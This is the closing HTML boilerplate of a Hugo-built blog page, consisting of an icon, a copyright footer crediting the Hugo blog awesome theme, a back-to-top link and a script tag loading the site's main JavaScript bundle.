    <path d="M4 4a16 16 0 0 1 16 16" />
    <circle cx="5" cy="19" r="1" />
</svg>
</a>
</div>
    <small class="footer_copyright">
        © 2025 Lum8rjack.
        Powered by <a href="https://github.com/hugo-sid/hugo-blog-awesome" target="_blank" rel="noopener">Hugo blog awesome</a>.
    </small>
</footer><a href="#" title="Go to top" id="totop">
    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960">
    <path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197Z"/>
</svg>

</a>


    






    
    <script src="https://blog.lum8rjack.com/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js" integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30&#43;lSNuSkl4QXuNyy8="></script>

    

</body>
</html>
